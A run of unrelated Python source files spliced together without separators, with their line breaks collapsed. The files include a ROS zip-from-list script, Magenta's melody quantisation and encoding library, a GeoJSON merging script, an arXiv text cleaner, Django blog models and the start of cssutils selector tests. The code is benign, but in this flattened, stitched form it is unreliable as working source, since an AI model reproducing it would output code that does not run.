key_types: raise ValueError( '[Key Type: {}] Invalid; Key Type must be one of "{}"'.format(key_type, '", "'.join(key_types)) ) table = get_lookup_table() key = 'key_{}'.format(key_type) results = table[table[key].isin(player_ids)] results = results.reset_index().drop('index', 1) return results #!/usr/bin/env python from zipfile import ZipFile import argparse import datetime import rospkg import yaml import glob import os def main(): # Parse arguments parser = argparse.ArgumentParser(description='Zip a collection of files from a config file list') parser.add_argument('-zip', type=str, default="", help='name of the zip output file') parser.add_argument('-list', type=str, default="", help='name of the yaml input config file list') args, unknown = parser.parse_known_args() # utils.check_unknown_args(unknown) if args.zip: zip_url = args.zip if zip_url[-4:] != '.zip': zip_url += '.zip' else: now = datetime.datetime.now() zip_url = zip_url = os.getenv("HOME") + '/zipped_' + now.strftime("%Y%m%d_%H%M%S") + '.zip' if args.list: list_url = args.list else: # Get an instance of RosPack with the default search paths rospack = rospkg.RosPack() list_url = rospack.get_path("handy_tools") + "/config/zip_from_list.yaml" with open(list_url, 'r') as list_file: yaml_data = yaml.load(list_file) print "Elements of list_to_zip in [{0}] will be zipped to [{1}]".format(list_url, zip_url) success_count = 0 fail_count = 0 with ZipFile(zip_url,'w') as zip: for element in yaml_data["list_to_zip"]: element = os.path.expanduser(element) element = os.path.expandvars(element) expanded_element = glob.glob(element) if not expanded_element: print "Unable to find file or files [{0}]".format(element) fail_count += 1 for finally_a_file in expanded_element: print "Zipping file [{0}]".format(finally_a_file) zip.write(finally_a_file) success_count += 1 print "{0} files successfully zipped, {1} failures".format(success_count, fail_count) if __name__ == "__main__": main() amedeosoria/Magenta # Copyright 2016 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Utility functions for working with melodies. Use Melody.extract_melodies to extract monophonic melodies from a NoteSequence proto. Use Melody.to_sequence to write a melody to a NoteSequence proto. Then use midi_io.sequence_proto_to_midi_file to write that NoteSequence to a midi file. Use MelodyEncoderDecoder.encode to convert a Melody object to a tf.train.SequenceExample of inputs and labels. These SequenceExamples are fed into the model during training and evaluation. During melody generation, use MelodyEncoderDecoder.get_inputs_batch to convert a list of melodies into an inputs batch which can be fed into the model to predict what the next note should be for each melody. Then use MelodyEncoderDecoder.extend_melodies to extend each of those melodies with an event sampled from the softmax output by the model. """ import abc import math # internal imports import numpy as np import tensorflow as tf from magenta.lib import sequence_example_lib from magenta.protobuf import music_pb2 # Special events. NUM_SPECIAL_EVENTS = 2 NOTE_OFF = -1 NO_EVENT = -2 # Other constants. MIN_MIDI_PITCH = 0 # Inclusive. MAX_MIDI_PITCH = 127 # Inclusive. NOTES_PER_OCTAVE = 12 DEFAULT_BEATS_PER_MINUTE = 120.0 BEATS_PER_BAR = 4 # This code assumes 4 beats per measure of music. # Standard pulses per quarter. # https://en.wikipedia.org/wiki/Pulses_per_quarter_note STANDARD_PPQ = 96 # Set the quantization cutoff. # Note events before this cutoff are rounded down to nearest step. Notes # above this cutoff are rounded up to nearest step. The cutoff is given as a # fraction of a step. # For example, with quantize_cutoff = 0.75 using 0-based indexing, # if .75 < event <= 1.75, it will be quantized to step 1. # If 1.75 < event <= 2.75 it will be quantized to step 2. # A number close to 1.0 gives less wiggle room for notes that start early, # and they will be snapped to the previous step. QUANTIZE_CUTOFF = 0.75 # NOTE_KEYS[note] = The major keys that note belongs to. # ex. NOTE_KEYS[0] lists all the major keys that contain the note C, # which are: # [0, 1, 3, 5, 7, 8, 10] # [C, C#, D#, F, G, G#, A#] # # 0 = C # 1 = C# # 2 = D # 3 = D# # 4 = E # 5 = F # 6 = F# # 7 = G # 8 = G# # 9 = A # 10 = A# # 11 = B # # NOTE_KEYS can be generated using the code below, but is explicitly declared # for readability: # scale = [1, 0, 1, 0, 1, 1, 0, 1, 0, 1, 0, 1] # NOTE_KEYS = [[j for j in xrange(12) if scale[(i - j) % 12]] # for i in xrange(12)] NOTE_KEYS = [ [0, 1, 3, 5, 7, 8, 10], [1, 2, 4, 6, 8, 9, 11], [0, 2, 3, 5, 7, 9, 10], [1, 3, 4, 6, 8, 10, 11], [0, 2, 4, 5, 7, 9, 11], [0, 1, 3, 5, 6, 8, 10], [1, 2, 4, 6, 7, 9, 11], [0, 2, 3, 5, 7, 8, 10], [1, 3, 4, 6, 8, 9, 11], [0, 2, 4, 5, 7, 9, 10], [1, 3, 5, 6, 8, 10, 11], [0, 2, 4, 6, 7, 9, 11]] class PolyphonicMelodyException(Exception): pass class BadNoteException(Exception): pass class Melody(object): """Stores a quantized stream of monophonic melody events. Melody is an intermediate representation that all melody models can use. NoteSequence proto to melody code will do work to align notes and extract monophonic melodies. Model specific code just needs to convert Melody to SequenceExample protos for TensorFlow. Melody implements an iterable object. Simply iterate to retrieve the melody events. Melody events are integers in range [-2, 127] (inclusive), where negative values are the special event events: NOTE_OFF, and NO_EVENT. Non-negative values [0, 127] are note-on events for that midi pitch. A note starts at a non-negative value (that is the pitch), and is held through subsequent NO_EVENT events until either another non-negative value is reached (even if the pitch is the same as the previous note), or a NOTE_OFF event is reached. A NOTE_OFF starts at least one step of silence, which continues through NO_EVENT events until the next non-negative value. NO_EVENT values are treated as default filler. Notes must be inserted in ascending order by start time. Note end times will be truncated if the next note overlaps. Melodies can start at any non-negative time, and are shifted left so that the bar containing the first note-on event is the first bar. Attributes: events: A python list of melody events which are integers. Melody events are described above. offset: When quantizing notes, this is the offset between indices in `events` and time steps of incoming melody events. An offset is chosen such that the first melody event is close to the beginning of `events`. steps_per_bar: Number of steps in a bar (measure) of music. last_on: Index of last note-on event added. This index will be within the range of `events`. last_off: Index of the NOTE_OFF event that belongs to the note-on event at `last_on`. This index is likely not in the range of `events` unless _write_all_notes was called. """ def __init__(self, steps_per_bar=16): """Construct an empty Melody. Args: steps_per_bar: How many time steps per bar of music. Melody needs to know about bars to skip empty bars before the first note. """ self.events = [] self.offset = 0 self.steps_per_bar = steps_per_bar self.last_on = None # Index of the last note-on event in `events`. # last_off is the index of the NOTE_OFF event belonging to the most # recently added note. self.last_off = None def __iter__(self): """Return an iterator over the events in this Melody. Returns: Python iterator over events. """ return iter(self.events) def __len__(self): """How many events are in this Melody. Returns: Number of events as an int. """ return len(self.events) def _can_add_note(self, start_step): """Check if a note-on event can be added at the given time step. Note-on events cannot be added at the same time as or before previous note-on events. Args: start_step: Time step of the note-on that we wish to add. This is a non-negative integer. Returns: True if `start_step` is after all previous note-on events. """ return self.last_on is None or start_step - self.offset > self.last_on def _add_note(self, pitch, start_step, end_step): """Adds the given note to the stream. The previous note's end step will be changed to end before this note if there is overlap. The note is not added if `start_step` is before the start step of the previously added note, or if `start_step` equals `end_step`. Args: pitch: Midi pitch. An integer between 0 and 127 inclusive. start_step: A non-negative integer step that the note begins on. end_step: An integer step that the note ends on. The note is considered to end at the onset of the end step. `end_step` must be greater than `start_step`. """ if not self._can_add_note(start_step): raise BadNoteException( 'Given start step %d is before last on event at %d' % (start_step, self.last_on)) if start_step == end_step: raise BadNoteException('Given start step and end step are the same: %d' % start_step) if not self.events: self.offset = start_step - start_step % self.steps_per_bar start_step_offset = start_step - self.offset end_step_offset = end_step - self.offset self.events += [NO_EVENT] * (start_step_offset - len(self.events) + 1) self.events[start_step_offset] = pitch if self.last_off is not None and self.last_off < start_step_offset: self.events[self.last_off] = NOTE_OFF self.last_on = start_step_offset self.last_off = end_step_offset def _write_all_notes(self): """Write remaining note off event to `events`. This internal method makes sure that all notes being temporarily stored in other instance variables, namely self.last_on and self.last_off, are written to self.events. __iter__ and __len__ will only return what is in self.events, so all notes must be written there after operating on the events in this instance. """ self.events += [NO_EVENT] * (self.last_off - len(self.events) + 1) self.events[self.last_off] = NOTE_OFF self.last_on = None self.last_off = None def _clear(self): """Clear `events` and last note-on/off information.""" self.events = [] self.last_on = None self.last_off = None def _distance_to_last_event(self, step): """Returns distance of the given step to the last off event. Args: step: Step to compute the distance to. Returns: Distance between step and last off event. 0 if events are the same. Negative if step comes before the last off event. Raises: ValueError: When the stream is empty. """ if self.last_off is None: raise ValueError('No events in the stream') return step - self.offset - self.last_off def get_note_histogram(self): """Gets a histogram of the note occurrences in a melody. Returns: A list of 12 ints, one for each note value (C at index 0 through B at index 11). Each int is the total number of times that note occurred in the melody. """ np_melody = np.array(self.events, dtype=int) return np.bincount( np_melody[np_melody >= MIN_MIDI_PITCH] % NOTES_PER_OCTAVE, minlength=NOTES_PER_OCTAVE) def get_major_key_histogram(self): """Gets a histogram of the how many notes fit into each key. Returns: A list of 12 ints, one for each Major key (C Major at index 0 through B Major at index 11). Each int is the total number of notes that could fit into that key. """ note_histogram = self.get_note_histogram() key_histogram = np.zeros(NOTES_PER_OCTAVE) for note, count in enumerate(note_histogram): key_histogram[NOTE_KEYS[note]] += count return key_histogram def get_major_key(self): """Finds the major key that this melody most likely belongs to. If multiple keys match equally, the key with the lowest index is returned, where the indexes of the keys are C Major = 0 through B Major = 11. Returns: An int for the most likely key (C Major = 0 through B Major = 11) """ key_histogram = self.get_major_key_histogram() return key_histogram.argmax() def from_notes(self, notes, bpm=120.0, gap=16, ignore_polyphonic_notes=False): """Populate self with an iterable of music_pb2.NoteSequence.Note. BEATS_PER_BAR/4 time signature is assumed. The given list of notes is quantized according to the given beats per minute and populated into self. Any existing notes in the instance are cleared. 0 velocity notes are ignored. The melody is ended when there is a gap of `gap` steps or more after a note. If note-on events occur at the same step, this melody is cleared and an exception is thrown. Args: notes: Iterable of music_pb2.NoteSequence.Note bpm: Beats per minute. This determines the quantization step size in seconds. Beats are subdivided according to `steps_per_bar` given to the constructor. gap: If this many steps or more follow a note, the melody is ended. ignore_polyphonic_notes: If False, and multiple notes occur within the same melody step, a PolyphonicMelodyException will be raised. If true, only one of the notes occurring in the same step will be used. The note used will be the note with the earlier NoteSequence `start_time`. If both notes have the same `start_time`, the note with the higher pitch is used, since melodies usually follow the top voicing when played alongside chords. Raises: PolyphonicMelodyException: If any of the notes start on the same step when quantized and ignore_polyphonic_notes is False. """ self._clear() # Compute quantization steps per second. steps_per_second = bpm / 60.0 * self.steps_per_bar / BEATS_PER_BAR quantize = lambda x: int(math.ceil(x - QUANTIZE_CUTOFF)) # Sort track by note start times, and secondarily by pitch descending. notes.sort(key=lambda note: (note.start_time, -note.pitch)) for note in notes: # Ignore 0 velocity notes. if not note.velocity: continue # Quantize the start and end times of the note. start_step = quantize(note.start_time * steps_per_second) end_step = quantize(note.end_time * steps_per_second) if end_step <= start_step: end_step = start_step + 1 # Do not allow notes to start in negative time. if start_step < 0: raise BadNoteException( 'Got negative note time: start_time = %s, end_time = %s' % (note.start_time, note.end_time)) # If start_step comes before or lands on an already added note's start # step, we cannot add it. Discard the melody because it is not monophonic. if not self._can_add_note(start_step): if ignore_polyphonic_notes: continue else: self._clear() raise PolyphonicMelodyException() # If a gap of `gap` or more steps is found, end the melody. if (len(self) and self._distance_to_last_event(start_step) >= gap): break # Add the note-on and off events to the melody. self._add_note(note.pitch, start_step, end_step) self._write_all_notes() def from_event_list(self, events): """Populate self with a list of event values.""" self.events = list(events) def to_sequence(self, velocity=100, instrument=0, sequence_start_time=0.0, bpm=120.0): """Converts the Melody to Sequence proto. Args: velocity: Midi velocity to give each note. Between 1 and 127 (inclusive). instrument: Midi instrument to give each note. sequence_start_time: A time in seconds (float) that the first note in the sequence will land on. bpm: Beats per minute (float). Returns: A NoteSequence proto encoding the given melody. """ seconds_per_step = 60.0 / bpm * BEATS_PER_BAR / self.steps_per_bar sequence = music_pb2.NoteSequence() sequence.tempos.add().bpm = bpm sequence.ticks_per_beat = STANDARD_PPQ current_sequence_note = None for step, note in enumerate(self): if MIN_MIDI_PITCH <= note <= MAX_MIDI_PITCH: # End any sustained notes. if current_sequence_note is not None: current_sequence_note.end_time = ( step * seconds_per_step + sequence_start_time) # Add a note. current_sequence_note = sequence.notes.add() current_sequence_note.start_time = ( step * seconds_per_step + sequence_start_time) # Give the note an end time now just to be sure it gets closed. current_sequence_note.end_time = ( (step + 1) * seconds_per_step + sequence_start_time) current_sequence_note.pitch = note current_sequence_note.velocity = velocity current_sequence_note.instrument = instrument elif note == NOTE_OFF: # End any sustained notes. if current_sequence_note is not None: current_sequence_note.end_time = ( step * seconds_per_step + sequence_start_time) current_sequence_note = None return sequence def transpose(self, transpose_amount, min_note=0, max_note=128): """Transpose notes in this Melody. All notes are transposed the specified amount. Additionally, all notes are octave shifted to lie within the [min_note, max_note) range. Args: transpose_amount: The number of half steps to transpose this Melody. Positive values transpose up. Negative values transpose down. min_note: Minimum pitch (inclusive) that the resulting notes will take on. max_note: Maximum pitch (exclusive) that the resulting notes will take on. """ for i in xrange(len(self.events)): # Transpose MIDI pitches. Special events below MIN_MIDI_PITCH are not # changed. if self.events[i] >= MIN_MIDI_PITCH: self.events[i] += transpose_amount if self.events[i] < min_note: self.events[i] = ( min_note + (self.events[i] - min_note) % NOTES_PER_OCTAVE) elif self.events[i] >= max_note: self.events[i] = (max_note - NOTES_PER_OCTAVE + (self.events[i] - max_note) % NOTES_PER_OCTAVE) def squash(self, min_note, max_note, transpose_to_key): """Transpose and octave shift the notes in this Melody. The key center of this melody is computed with a heuristic, and the notes are transposed to be in the given key. The melody is also octave shifted to be centered in the given range. Additionally, all notes are octave shifted to lie within a given range. Args: min_note: Minimum pitch (inclusive) that the resulting notes will take on. max_note: Maximum pitch (exclusive) that the resulting notes will take on. transpose_to_key: The melody is transposed to be in this key. 0 = C Major. Returns: How much notes are transposed by. """ melody_key = self.get_major_key() key_diff = transpose_to_key - melody_key midi_notes = [note for note in self.events if MIN_MIDI_PITCH <= note <= MAX_MIDI_PITCH] if not midi_notes: return 0 melody_min_note = min(midi_notes) melody_max_note = max(midi_notes) melody_center = (melody_min_note + melody_max_note) / 2 target_center = (min_note + max_note - 1) / 2 center_diff = target_center - (melody_center + key_diff) transpose_amount = ( key_diff + NOTES_PER_OCTAVE * int(round(center_diff / float(NOTES_PER_OCTAVE)))) self.transpose(transpose_amount, min_note, max_note) return transpose_amount def extract_melodies(sequence, steps_per_beat=4, min_bars=7, min_unique_pitches=5): """Extracts a list of melodies from the given NoteSequence proto. A time signature of BEATS_PER_BAR is assumed for each sequence. If the sequence has an incompatible time signature, like 3/4, 5/4, etc, then the time signature is ignored and BEATS_PER_BAR/4 time is assumed. Once a note-on event in a track is encountered, a melody begins. Once a gap of silence since the last note-off event of a bar length or more is encountered, or the end of the track is reached, that melody is ended. Only the first melody of each track is used (this reduces the number of repeated melodies that may come from repeated choruses or verses, but may also cause unique non-first melodies, such as bridges and outros, to be missed, so maybe this should be changed). The melody is then checked for validity. The melody is only used if it is at least `min_bars` bars long, and has at least `min_unique_pitches` unique notes (preventing melodies that only repeat a few notes, such as those found in some accompaniment tracks, from being used). After scanning each instrument track in the NoteSequence, a list of all the valid melodies is returned. Args: sequence: A NoteSequence proto containing notes. steps_per_beat: How many subdivisions of each beat. BEATS_PER_BAR/4 time is assumed, so steps per bar is equal to `BEATS_PER_BAR` * `steps_per_beat`. min_bars: Minimum length of melodies in number of bars. Shorter melodies are discarded. min_unique_pitches: Minimum number of unique notes with octave equivalence. Melodies with too few unique notes are discarded. Returns: A python list of Melody instances. """ # Assume bars contain 4 beats, or quarter notes. steps_per_bar = steps_per_beat * 4 # Beats per minute is stored in the tempo change event. If there is no tempo # then assume 120 bpm per the MIDI standard. bpm = (sequence.tempos[0].bpm if len(sequence.tempos) else DEFAULT_BEATS_PER_MINUTE) # Group note messages into tracks. tracks = {} for note in sequence.notes: if note.instrument not in tracks: tracks[note.instrument] = [] tracks[note.instrument].append(note) melodies = [] for track in tracks.values(): melody = Melody(steps_per_bar) # Quantize the track into a Melody object. # If any notes start at the same time, only one is kept. melody.from_notes(track, bpm=bpm, gap=steps_per_bar, ignore_polyphonic_notes=True) # Require a certain melody length. if len(melody) - 1 < steps_per_bar * min_bars: tf.logging.debug('melody too short') continue # Require a certain number of unique pitches. note_histogram = melody.get_note_histogram() unique_pitches = np.count_nonzero(note_histogram) if unique_pitches < min_unique_pitches: tf.logging.debug('melody too simple') continue melodies.append(melody) return melodies class MelodyEncoderDecoder(object): """An abstract class for translating between melodies and model data. When building your dataset, the `encode` method takes in a melody and returns a SequenceExample of inputs and labels. These SequenceExamples are fed into the model during training and evaluation. During melody generation, the `get_inputs_batch` method takes in a list of the current melodies and returns an inputs batch which is fed into the model to predict what the next note should be for each melody. The `extend_melodies` method takes in the list of melodies and the softmax returned by the model and extends each melody by one step by sampling from the softmax probabilities. This loop (`get_inputs_batch` -> inputs batch is fed through the model to get a softmax -> `extend_melodies`) is repeated until the generated melodies have reached the desired length. The `melody_to_input`, `melody_to_label`, and `class_index_to_melody_event` methods must be overwritten to be specific to your model. See basic_rnn/basic_rnn_encoder_decoder.py for an example of this. """ __metaclass__ = abc.ABCMeta def __init__(self, min_note=48, max_note=84, transpose_to_key=0): """Initializes a MelodyEncoderDecoder object. You can change `min_note` and `max_note` to increase/decrease the melody range. Since melodies are transposed into this range to be run through the model and then transposed back into their original range after the melodies have been extended, the location of the range is somewhat arbitrary, but the size of the range determines the possible size of the generated melodies range. `transpose_to_key` should be set to the key that if melodies were transposed into that key, they would best sit between `min_note` and `max_note` with having as few notes outside that range. The same `min_note`, `max_note`, and `transpose_to_key` values should be used when creating your dataset, training your model, and generating melodies from it. If you change `min_note`, `max_note`, or `transpose_to_key`, you will have to recreate your dataset and retrain your model before you can accurately generate melodies from it. Args: min_note: The minimum midi pitch the encoded melodies can have. max_note: The maximum midi pitch the encoded melodies can have. transpose_to_key: The key that encoded melodies will be transposed into. Attributes: min_note: The minimum midi pitch the encoded melodies can have. max_note: The maximum midi pitch the encoded melodies can have. transpose_to_key: The key that encoded melodies will be transposed into. Properties: input_size: The length of the list returned by self.melody_to_input. num_classes: The range of ints that can be returned by self.melody_to_label. Raises: ValueError: If `min_note` or `max_note` are outside the midi range, or if the [`min_note`, `max_note`) range is less than an octave. A range of at least an octave is required to be able to octave shift notes into that range while preserving their scale value. """ if min_note < MIN_MIDI_PITCH: raise ValueError('min_note must be >= 0. min_note is %d.' % min_note) if max_note > MAX_MIDI_PITCH + 1: raise ValueError('max_note must be <= 128. max_note is %d.' % max_note) if max_note - min_note < NOTES_PER_OCTAVE: raise ValueError('max_note - min_note must be >= 12. min_note is %d. ' 'max_note is %d. max_note - min_note is %d.' % (min_note, max_note, max_note - min_note)) if transpose_to_key < 0 or transpose_to_key > NOTES_PER_OCTAVE - 1: raise ValueError('transpose_to_key must be >= 0 and <= 11. ' 'transpose_to_key is %d.' % transpose_to_key) self.min_note = min_note self.max_note = max_note self.transpose_to_key = transpose_to_key @abc.abstractproperty def input_size(self): """The size of the input vector used by this model. Returns: An int, the length of the list returned by self.melody_to_input. """ pass @abc.abstractproperty def num_classes(self): """The range of labels used by this model. Returns: An int, the range of ints that can be returned by self.melody_to_label. """ pass @abc.abstractmethod def melody_to_input(self, melody): """Returns the input vector for the last event in the melody. Args: melody: A Melody object. Returns: An input vector, a self.input_size length list of floats. """ pass @abc.abstractmethod def melody_to_label(self, melody): """Returns the label for the last event in the melody. Args: melody: A Melody object. Returns: A label, an int in the range [0, self.num_classes). """ pass def encode(self, melody): """Returns a SequenceExample for the given melody. Args: melody: A Melody object. Returns: A tf.train.SequenceExample containing inputs and labels. """ melody.squash(self.min_note, self.max_note, self.transpose_to_key) inputs = [] labels = [] melody_events = melody.events melody.events = melody_events[:1] for i in xrange(1, len(melody_events)): inputs.append(self.melody_to_input(melody)) melody.events = melody_events[:i + 1] labels.append(self.melody_to_label(melody)) return sequence_example_lib.make_sequence_example(inputs, labels) def get_inputs_batch(self, melodies, full_length=False): """Returns an inputs batch for the given melodies. Args: melodies: A list of Melody objects. full_length: If True, the inputs batch will be for the full length of each melody. If False, the inputs batch will only be for the last event of each melody. A full-length inputs batch is used for the first step of extending the melodies, since the rnn cell state needs to be initialized with the priming melody. For subsequent generation steps, only a last-event inputs batch is used. Returns: An inputs batch. If `full_length` is True, the shape will be [len(melodies), len(melodies[0]), INPUT_SIZE]. If `full_length` is False, the shape will be [len(melodies), 1, INPUT_SIZE]. """ inputs_batch = [] for melody in melodies: inputs = [] if full_length and len(melody): melody_events = melody.events for i in xrange(len(melody_events)): melody.events = melody_events[:i + 1] inputs.append(self.melody_to_input(melody)) else: inputs.append(self.melody_to_input(melody)) inputs_batch.append(inputs) return inputs_batch @abc.abstractmethod def class_index_to_melody_event(self, class_index, melody): """Returns the melody event for the given class index. This is the reverse process of the self.melody_to_label method. Args: class_index: An int in the range [0, self.num_classes). melody: A Melody object. This object is not used in this implementation, but see models/lookback_rnn/lookback_rnn_encoder_decoder.py for an example of how this object can be used. Returns: A Melody event value, an int in the range [-2, 127]. -2 = no event, -1 = note-off event, [0, 127] = note-on event for that midi pitch. """ pass def extend_melodies(self, melodies, softmax): """Extends the melodies by sampling from the softmax probabilities. Args: melodies: A list of Melody objects. softmax: A list of softmax probability vectors. The list of softmaxes should be the same length as the list of melodies. """ num_classes = len(softmax[0][0]) for i in xrange(len(melodies)): chosen_class = np.random.choice(num_classes, p=softmax[i][-1]) melody_event = self.class_index_to_melody_event(chosen_class, melodies[i]) melodies[i].events.append(melody_event) #This Script is supposed to pull all the coordinates from the second line of every state json file in world.geo.json/countries/USA import os fileToWrite = "C:\\Users\\Sean\\Desktop\\School\\Senior Year\\CMSC 447\\Covid-MapTracker-T3-Site\\Covid-MapTracker-T3.github.io\\US-Counties.js" f2 = open(fileToWrite, 'w') countries = ["AK", "AL", "AR", "AZ", "CA", "CO", "CT", "DC", "DE", "FL", "GA", "HI", "IA", "ID", "IL", "IN", "KS", "KY", "LA", "MA", "MD", "ME", "MI", "MN", "MO", "MS", "MT", "NC", "ND", "NE", "NH", "NJ", "NM", "NV", "NY", "OH", "OK", "OR", "PA", "PR", "RI", "SC", "SD", "TN", "TX", "UT", "VA", "VT", "WA", "WI", "WV", "WY"] length = len(countries) for x in range(length): path = "C:\\Users\\Sean\\Desktop\\School\\Senior Year\\CMSC 447\\Covid-MapTracker-T3-Site\\world.geo.json\\countries\\USA\\" + countries[x] for filename in os.listdir(path): with open(os.path.join(path, filename), 'r') as f: # open in read-only mode f2.write(f.read() + ',') f2.close()sqrl-planner/sqrl-server import pytest def test_true(): assert True import re import os from gensim.parsing.preprocessing import remove_stopwords from joblib import Parallel, delayed, dump, load # import custom process display from util import show_progress import time ####################################################### #################### PATH PARSING ##################### ####################################################### # retrieve my home directory local_file = '../home_directory/home_dir.txt' with open(local_file, 'r') as file: my_home = file.read().rstrip('\r\n') # set RAID 0 array mount path raid_path = my_home + '/mnt/4T_nvme' # set text directory path read_directory = raid_path + '/arxiv_data/raw_text_latest' # astro-ph_latest write_directory = raid_path + '/arxiv_data/clean_text_latest' # clean_astro-ph_latest ######################################################## #################### I/O FUNCTIONS ##################### ######################################################## def read_file(path): """Returns document read in by line""" with open(path, 'r') as f_in: # read in text file doc = f_in.readlines() return doc def write_file(path, new_doc): """Writes new file to specified path""" with open(path, 'w') as f_out: # write new text string to new text file for new_line in new_doc: f_out.write(new_line) ######################################################## #################### TEXT CLEANING ##################### ######################################################## # define ligature mapping to restore words ligatures = {'': 'ff', '': 'fi', '': 'fl', '': 'ffi'} # get hexadecimal codes for ligatures keys = list(ligatures.keys()) # set Regex pattern for additional hexadecimal codes not being replaced hex_string = ' ' pattern = '[' + hex_string + ']' def remove_hex(string): """Returns text string free of hexadecimal coding""" for key in keys: regex = re.compile(key) match_object = regex.findall(string) if len(match_object) != 0: string = string.replace(key, ligatures[key]) string = re.sub(pattern, '', string) return string def keep_alphanumeric(string): """Returns string with only alphanumeric and whitespace type characters""" string = re.sub(r'[^A-Za-z0-9\s]+', '', string) return string def downcase(string): """Returns string with lowercase characters""" string = string.lower() return string def no_stopwords(string): """Returns string without stopwords""" string = remove_stopwords(string) return string def no_short_lines(string): """Returns final cleaned string""" if len(string) > 3: # remove whitespace and new line character string = re.sub('\s+', ' ', string) # remove stopwords string = no_stopwords(string) return string def clean_file(path_pair): """Reads in a file, cleans its text, and writes a new file""" # split file path tuple read_path, write_path = path_pair # get next file doc = read_file(read_path) # instantiate text file to return new_doc = [] # iterate through text string for line in doc: # remove hexadecimal codes and restore English words new_string = remove_hex(line) # remove all characters except alphanumeric and whitespace new_string = keep_alphanumeric(new_string) # downcase text new_string = downcase(new_string) # eliminate short lines created by parsing equations, figures, tables, and page numbers if len(new_string) > 3: # remove whitespace and new line character new_string = no_short_lines(new_string) # remove stopwords and add whitespace for end of each line new_string = remove_stopwords(new_string) + ' ' # add filtered string to new string list new_doc.append(new_string) # save new cleaned file write_file(write_path, new_doc) ########################################################## #################### PARALLELIZATION ##################### ########################################################## def make_chunks(paths, chunksize): """Returns path pairs broken into chunks""" chunks = (paths[idx: idx + chunksize] for idx in range(0, len(paths), chunksize)) return chunks def parallel_cleaner(paths): """Runs parallel processed cleaned text""" # instantiate parallel helper executor = Parallel(n_jobs=20, backend='multiprocessing', prefer="processes") # create jobs to distribute execution of test cleaner jobs = delayed(clean_file) # create task chain task_chain = (jobs(chunk) for chunk in paths) # execute parallel jobs executor(task_chain) ######################################################### #################### MAIN EXECUTION ##################### ######################################################### if __name__ == '__main__': # instantiate directories lists files_to_read = [] files_to_write = [] # iterate through directories for dir in sorted(os.listdir(read_directory)): # display directory being cleaned print(dir) # iterate through files from given path files_to_clean = sorted(os.listdir(os.path.join(read_directory, dir))) # set starting number of files to clean for progress display files_left_to_clean = len(files_to_clean) for file in files_to_clean: # display progress show_progress(files_left_to_clean) # set file paths to nested folders read_path = read_directory + '/' + dir + '/' + file write_path = write_directory + '/' + dir + '/' + file # add both file paths to directories lists files_to_read.append(read_path) files_to_write.append(write_path) # update progress display files_left_to_clean += -1 # create chunked path generator paths = list(zip(files_to_read, files_to_write)) chunked_paths = make_chunks(paths, chunksize=1000) start = time.time() # execute parallel text cleaning jobs parallel_cleaner(paths) end = time.time() total_time = end - start print(total_time) from django.db import models from django.contrib.auth.models import User # Create your models here. class Article(models.Model): title = models.CharField(max_length=100) slug = models.SlugField() body = models.TextField() date = models.DateTimeField(auto_now_add=True) thumb = models.ImageField(default='default.png',blank=True) author = models.ForeignKey(User,on_delete=models.CASCADE,default=None) # if you don't right this you will see the object of article not the title of object def ___str__(self): return self.title def snippet(self): return self.body[:150]+'....' class Comment(models.Model): author = models.ForeignKey(User, on_delete=models.CASCADE, default=None) text = models.TextField() created_date = models.DateTimeField(auto_now_add=True) article = models.ForeignKey(Article,on_delete=models.CASCADE,db_column='slug',default=None) def __str__(self): return self.textfrom .missing_element_base import MissingElementBase class MissingList(MissingElementBase): def __repr__(self): if self._key: return f"" return '' def items(self): return [] def optional_string_values(self): return [] def optional_values(self, _loader): return [] def required_string_values(self): return [] def required_values(self, _loader): return [] 0 #! /usr/bin/env python # -*- coding: utf8 -*- """ __author__ = 'Yan' Started by '2019-08-07' Description: Called whenever a project has been created. project-created --project --head """ from optparse import OptionParser def main(): usage = 'project-created --project --head ' des = 'project-created hooks' prog = '%prog' version = '1.0.0' p = OptionParser(usage=usage, description=des, prog=prog, version=version) p.add_option('--project', type=str, help='project') p.add_option('--head', type=str, help='head') option, args = p.parse_args() print(option) if __name__ == '__main__': main() """Testcases for cssutils.css.selectorlist.SelectorList.""" import xml.dom import basetest import cssutils from cssutils.css.selectorlist import SelectorList class SelectorListTestCase(basetest.BaseTestCase): def setUp(self): self.r = SelectorList() def test_init(self): "SelectorList.__init__() and .length" s = SelectorList() self.assertEqual(0, s.length) s = SelectorList('a, b') self.assertEqual(2, s.length) self.assertEqual(u'a, b', s.selectorText) s = SelectorList(selectorText='a') self.assertEqual(1, s.length) self.assertEqual(u'a', s.selectorText) s = SelectorList(selectorText=('p|a', {'p': 'uri'})) # n-dict self.assertEqual(1, s.length) self.assertEqual(u'p|a', s.selectorText) s = SelectorList(selectorText=('p|a', (('p', 'uri'),))) # n-tuples self.assertEqual(1, s.length) self.assertEqual(u'p|a', s.selectorText) def test_parentRule(self): "Selector.parentRule" def check(style): self.assertEqual(style, style.selectorList.parentRule) for sel in style.selectorList: self.assertEqual(style.selectorList, sel.parent) style = cssutils.css.CSSStyleRule('a, b') check(style) # add new selector style.selectorList.append(cssutils.css.Selector('x')) check(style) # replace selectorList style.selectorList = cssutils.css.SelectorList('x') check(style) # replace selectorText style.selectorText = ('x, y') check(style) def test_appendSelector(self): "SelectorList.appendSelector() and .length" s = SelectorList() s.appendSelector('a') self.assertEqual(1, s.length) self.assertRaises(xml.dom.InvalidModificationErr, s.appendSelector, 'b,') self.assertEqual(1, s.length) self.assertEqual(u'a', s.selectorText) s.append('b') self.assertEqual(2, s.length) self.assertEqual(u'a, b', s.selectorText) s.append('a') self.assertEqual(2, s.length) self.assertEqual(u'b, a', s.selectorText) # __setitem__ self.assertRaises(IndexError, s.__setitem__, 4, 'x') s[1] = 'c' self.assertEqual(2, s.length) self.assertEqual(u'b, c', s.selectorText) # TODO: remove duplicates? # s[0] = 'c' # self.assertEqual(1, s.length) # self.assertEqual(u'c', s.selectorText) s = SelectorList() s.appendSelector(('p|a', {'p': 'uri', 'x': 'xxx'})) self.assertEqual(u'p|a', s.selectorText) # x gets lost as not used self.assertRaises(xml.dom.NamespaceErr, s.append, 'x|a') # not set at all self.assertRaises(xml.dom.NamespaceErr, s.append, 'y|a') # but p is retained s.append('p|b') self.assertEqual(u'p|a, p|b', s.selectorText) def test_selectorText(self): "SelectorList.selectorText" s = SelectorList() s.selectorText = 